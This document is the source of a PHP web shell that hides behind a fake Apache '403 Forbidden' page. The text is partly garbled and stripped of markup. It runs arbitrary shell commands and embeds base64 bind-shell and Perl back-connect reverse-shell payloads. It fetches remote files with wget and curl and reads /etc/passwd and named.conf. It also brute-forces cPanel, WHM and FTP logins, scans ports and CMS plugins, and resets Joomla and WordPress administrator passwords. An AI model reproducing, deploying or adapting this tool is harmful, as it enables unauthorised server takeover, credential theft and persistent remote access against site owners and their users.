The System Is Going To Down For LogOut Administrator Pages!!'; ?> &1","r"))) { return 126; } while (!feof($p)) { $line=fgets($p,1000); $out .= $line; } pclose($p); return $out; } function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != "d") {$second = "a";} return array($one,$second); } $disablefunc = @ini_get("disable_functions"); function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "".$disablefunc.""; } else { return "NONE"; } } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } else { $res = "Ex() Disabled!"; } } return $res; } function showstat($stat) { if ($stat=="on") { return "ON"; } else { return "OFF"; } } function testperl() { if (ex('perl -h')) { return showstat("on"); } else { return showstat("off"); } } function testfetch() { if(ex('fetch --help')) { return showstat("on"); } else { return showstat("off"); } } function testwget() { if (ex('wget --help')) { return showstat("on"); } else { return showstat("off"); } } function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } } function testpostgresql() { if (function_exists('pg_connect')) { return showstat("on"); } else { return showstat("off"); } } function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } } function testcurl() { if (function_exists('curl_version')) { return showstat("on"); } else { return showstat("off"); } } function testmysql() { if (function_exists('mysql_connect')) { return showstat("on"); } else { return showstat("off"); } } $quotes = get_magic_quotes_gpc(); if ($quotes == "1" or $quotes == "on") { $quot = "ON"; } else { $quot = "OFF"; } function printLogin() { ?> 403 Forbidden

Forbidden

You don't have permission to access this file on this server .


Apache/2.2.8 at Port 80
[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $bytes = disk_free_space("."); $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' ); $base = 1024; $class = min((int)log($bytes , $base) , count($si_prefix) - 1); $totalspace_bytes = disk_total_space("."); $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' ); $totalspace_bases = 1024; $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1); $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . ''; $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . ''; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $bindport = "55555"; $bindport_pass = "Newbie3viLc063s"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++) { $pathz = ""; for($j = 0 ; $j <= $i ; $j++) { $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "".$pwds[$i]." ".DIRECTORY_SEPARATOR." "; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } if(isset($_POST['chmod'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value; } @chmod($pwd.$name,octdec($value)); $file = $pwd.$name; } if(isset($_POST['chmod_folder'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value; } @chmod($pwd.$name,octdec($value)); $file = $pwd.$name; } $buff = $DISP_SERVER_SOFTWARE."
"; $buff .= ''.$system.'
'; if($id != "") $buff .= $id."
"; $buff .= "Server IP : "."$server_ip"." | "."Your IP : "."$my_ip"."
"; $buff .= "Total HDD Space : "."$totalspace_show"." | "."Free HDD Space : "."$freespace_show"."
"; $buff .= "Magic Quotes:$quot"."
"; $buff .= "Disabled Functions: ".showdisablefunctions()."
"; $buff .= "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql()." cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."
"; if($safemode) $buff .= "safemode ON
"; else $buff .= "safemode OFF
"; $buff .= $letters." > ".$pwdurl; function rapih($text){ return trim(str_replace("
","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt) { $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)) { while($file = readdir($dh)) { if(is_dir($file)) { $dname[] = $file; } elseif(is_file($file)) { $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = "
CMD@$prompt
view file/folder
"; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder) { if($folder == ".") { if(!$win && $posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= " "; } elseif($folder == "..") { if(!$win && $posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= ""; } else { if(!$win && $posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= ""; } } foreach($fname as $file) { $full = $pwd.$file; if(!$win && $posix) { $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= ""; } $buff .= "
name size owner:group perms modified actions
$folder - ".$owner."
".get_perms($pwd)."
".date("d-M-Y H:i",@filemtime($pwd))." newfile | newfolder
$folder - ".$owner."
".get_perms($parent)."
".date("d-M-Y H:i",@filemtime($parent))." newfile | newfolder
[ $folder ]
DIR ".$owner."
".get_perms($pwd.$folder)."
".date("d-M-Y H:i",@filemtime($folder))." rename | delete
$file
".ukuran($full)." ".$owner."
".get_perms($full)."
".date("d-M-Y H:i",@filemtime($full))." edit | rename | delete | download (gz)
"; return $buff; } function ukuran($file) { if($size = @filesize($file)) { if($size <= 1024) return $size; else { if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text) { $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function tulis_2($file,$text) { $textz = base64_decode($text); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")) { while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr) { $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url) { $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)) { $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <?php print TITLE; ?> <?php echo VERSION; ?>
"; $msg .= "

Connected to ".$sqluser."@".$sqlhost.":".$sqlport; $msg .= "  ->  [ databases ]"; if(isset($_GET['db'])) $msg .= "  ->   ".htmlspecialchars($_GET['db']).""; if(isset($_GET['table'])) $msg .= "  ->    ".htmlspecialchars($_GET['table']).""; $msg .= "

version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."

"; $msg .= "
"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))) { $db = $_GET['db']; $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table; \nCREATE TABLE `Newbie3viLc063s0_table` ( `file` LONGBLOB NOT NULL ); \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM Newbie3viLc063s0_table; \nDROP TABLE IF EXISTS Newbie3viLc063s0_table;"; $msg = "

"; $tables = array(); $msg .= ""; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)) { @array_push($tables,$table); } @sort($tables); foreach($tables as $table) { $msg .= ""; } $msg .= "
available tables on ".$db."
$table
"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))) { $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "

"; $columns = array(); $msg = ""; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)) { $msg .= ""; $kolum = $column; } $msg .= ""; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)) { $msg .= ""; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= ""; } $msg .= ""; } $msg .= "
$column
$data
"; $head = "
Page
"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")) { $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "

"; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query) { if(trim($query) != "") { $hasil = mysql_query($query); if($hasil) { $msg .= "

".$query.";    [ ok ]

"; $msg .= ""; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= ""; $msg .= ""; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= ""; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= ""; } $msg .= ""; } $msg .= "
".htmlspecialchars(@mysql_field_name($hasil,$i))."
".$dataz."
"; } else $msg .= "

".$query.";   [ error ]

"; } } } else { $query = "SHOW PROCESSLIST;\n SHOW VARIABLES;\n SHOW STATUS;"; $msg = "

"; $dbs = array(); $msg .= ""; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db) { $msg .= ""; } $msg .= "
available databases
$db
"; } @mysql_close($con); } else $msg = "

cant connect to mysql server

"; echo $msg; } else { ?>
Connect to mySQL server
  Host
  Username
  Password
  Port  
   mail to
    from
   subject
 
    
".$lang[$language.'_text96'].""; } else { print "


Target ! :


User

Pass



Sila pilih : Manual Target Brute :
cPanel ftp whm ==>

"; } ?> Failed! : NEXT TARGET!"; exit;} elseif ( curl_errno($ch) == 0 ){ print "[ Newbie3viLc063s0@email ]# Completed , Username = $asu Password = $babi
"; } curl_close($ch); } function ftp_check($link,$user,$pswd,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$link"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print " Failed! : NEXT TARGET!"; exit; } elseif ( curl_errno($ch) == 0 ){ print "serangan selesai , username = $user dan passwordnya = $pswd
"; } curl_close($ch); } function cpanel_check($anjink,$asu,$babi,$lonte){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print " Failed! : NEXT TARGET!"; exit;} elseif ( curl_errno($ch) == 0 ){ print "[ Newbie3viLc063s@email ]# Completed, Username = $asu Password = $babi
"; } curl_close($ch); } function whm_check($anjink,$asu,$babi,$lonte){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print " Failed! : NEXT TARGET!"; exit;} elseif ( curl_errno($ch) == 0 ) { print "[ " . TITLE . " ]# Selesai , Username = $asu Password = $babi
"; } curl_close($ch); } if(isset($pokeng) && !empty($pokeng)) { $userlist = explode ("\n" , $hn ); $passlist = explode ("\n" , $crew ); print "[ " . TITLE . " ]# ATTACK...!!!
"; foreach ($userlist as $asu) { $_user = trim($asu); foreach ($passlist as $babi ) { $_pass = trim($babi); if ($bisa == "manual") { manual_check($manualtarget,$_user,$_pass,$lonte); } if($bisa == "ftp") { ftp_check($pasti,$_user,$_pass,$lonte); } if ($bisa == "cpanel") { cpanel_check($pasti,$_user,$_pass,$lonte); } if ($bisa == "whm") { whm_check($pasti,$_user,$_pass,$lonte); } } } } } //bruteforce elseif(isset($_GET['x']) && ($_GET['x'] == 'readable')) { ?>

Newbie3viLc063s Cpanel Finder'; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('Error: safe_mode = on'); set_time_limit(0); ################### @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('[-] Error : coudn`t read /etc/passwd'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } ################### echo '

'; echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."
"; echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."
"; echo "[~] Searching for passwords in config files...\n\n"."


"; foreach ($users as $user) { $path = "/home/$user/public_html/"; echo "$path
"; } echo "


"; echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n"."
"; echo "[+] Complete...\n"."
"; echo '

'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain')) { ?>
"; $file = @implode(@file("/etc/named.conf")); if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); } preg_match_all("#named/(.*?).db#",$file ,$r); $domains = array_unique($r[1]); function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; } check(); echo ""; foreach($domains as $domain) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain)); echo ""; } echo "
[+] Here We Have : [".count($domains)."] Listed Domains In localhost.
List Of Users List Of Domains
$domain ".$user['name']."
"; //radable public_html } elseif(isset($_GET['x']) && ($_GET['x'] == 'port-scanner')) { ?>

Port Scanner
'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo "Port $i is open
"; } flush(); } }else{ echo ' Host:

Port start:

Port end:

'; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'string-encode')) { ?>


Insert STRING Here :



"; if (isset($_POST['submit_hash'])) { if (isset($_POST['hash_input'])) { $hash_input = $_POST['hash_input']; } if ($hash_input=="") { // show error if nothing inserted in input box echo 'Nothing Inserted!'; } else { if (isset($hash_input)) { foreach (hash_algos() as $hash_setoption) { // set to use all hash function $calculate_hash = hash($hash_setoption, $hash_input, false); // calculate all hash and declare variable echo ""; echo ""; // output } } echo '
$hash_setoption$calculate_hash
'; } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'cms-scanner')) { ?> Not FoundDownload"; }else{ echo"Found ..!<--"; } } /**************************************************************/ /* Joomla Conf */ function get_components($site){ $source = @file_get_contents($site); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... check it .";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "$comm"; ask_exploit_db($comm); } } /**************************************************************/ /* WP Conf */ function get_plugins($site){ $source = @file_get_contents($site); preg_match_all("#/plugins/(.*?)/#i", $source, $f); $plugins=array_unique($f[1]); if(count($plugins)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... check it .";} foreach($plugins as $plugin){ echo "$plugin"; ask_exploit_db($plugin); } } /**************************************************************/ /* Nuke's Conf */ function get_numod($site){ $source = @file_get_contents($site); preg_match_all('{?name=(.*?)/}i',$source,$f); preg_match_all('{?name=(.*?)(&|&|l_op=")}i',$source,$f2); preg_match_all('{/modules/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... check it .";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $nmod){ echo "$nmod"; ask_exploit_db($nmod); } } /*****************************************************/ /* Xoops Conf */ function get_xoomod($site){ $source = @file_get_contents($site); preg_match_all('{/modules/(.*?)/}i',$source,$f); $arz=array_merge($f[1]); $coms=array(); if(count($arz)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... check it .";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $xmod){ echo "$xmod"; ask_exploit_db($xmod); } } /**************************************************************/ /* Header */ function t_header($site){ echo''; echo' '; } ?>

 

 

 

 


Site :

'; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset')) { ?>


Site : '.$site.' Exploit-db Exploit it !

Host :
user :
Pass :
db :
dbprefix :
Admin User :
Admin Password :
'; $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $jop = $_POST['jop']; $users = $_POST['users']; $admpas = $_POST['passwd']; function joomlahash($password) { $random = rand(); $string = md5("$random"); $yourpassword = "$password"; $random32 = "$string"; $join = "$password$random32"; $md5 = md5("$join"); $jomlaahash = "$md5:$random32"; return $jomlaahash; } if(isset($host) ) { $con =@ mysql_connect($host,$user,$pass) or die ; $cond =@ mysql_select_db($db) or die; $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = Super Administrator"); $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = Super Administrator"); $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = deprecated"); $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = deprecated"); }else{ echo "

Enter the database !

"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset')) { ?>



Host :
user :
Pass :
db :
user admin :
pass admin :
'; $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $useradmin = $_POST['useradmin']; $pass_ad = $_POST['passadmin']; if(isset($host) ) { $con =@ mysql_connect($host,$user,$pass) or die ; $sedb =@ mysql_select_db($db) or die; $crypt = crypt($pass_ad); $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die('Cant Update ID Number 1'); $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die('Cant Update ID Number 1'); if ($query) { echo "

Queried !

"; } else if (!$query) { echo "error"; } }else { echo "

Enter the database !

"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'web-info')) { ?>
',''); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("http://networktools.nl/asinfo/$site"); $ip = @findit($getip,'
','
'); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("http://networktools.nl/reverseip/$site"); $ip = @findit($getip,'
','
'); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains"); $ip = @findit($getip,'Nameservers found:','